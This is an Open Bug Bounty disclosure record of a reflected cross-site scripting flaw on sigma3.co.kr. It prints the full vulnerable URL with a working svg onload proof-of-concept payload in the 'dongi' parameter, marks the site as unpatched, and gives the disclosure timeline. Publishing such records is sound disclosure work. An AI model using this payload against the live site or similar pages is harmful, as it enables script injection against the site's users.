sigma3.co.kr XSS vulnerability

2017-06-22T03:36:00
ID OBB:251193
Type openbugbounty
Reporter keritzy
Modified 2017-06-29T10:15:00

Description

Vulnerable URL:
http://sigma3.co.kr/info_list.php?dongi=%22%3E%3Csvg/onload=confirm(/OPENBUGBOUNTY/)%3E%EC%84%9C%ED%98%84%EB%8F%99&categoryi;=undefined&parti;=undefined&maemae;_money1=undefined&maemae;_money2=undefined&jen;_money1=undefined&jen;_money2=undefined&security;_money1=undefined&security;_money2=undefined&month;_money1=undefined&month;_money2=undefined&good1;=undefined&good2;=undefined&good3;=undefined&good4;=undefined&good5;=undefined&good6;=undefined&good7;=undefined&good8;=undefined&good9;=undefined&good1;=undefined&thema1;=undefined&thema2;=undefined&thema3;=undefined&thema4;=undefined&thema5;=undefined&thema6;=undefined&thema7;=undefined&thema8;=undefined&thema9;=undefined&thema1;=undefined&id;=undefined&maemae;_moneyi=undefined&jen;_moneyi=undefined&security;_moneyi=undefined&month;_moneyi=undefined
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
VIP website status:| No
sigma3.co.kr SSL connection:| Grade: F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 June, 2017 03:36 GMT
Generic security notifications sent to website owner| 22 June, 2017 09:19 GMT
Notification sent to subscribers (without technical details)| 22 June, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2017 10:15 GMT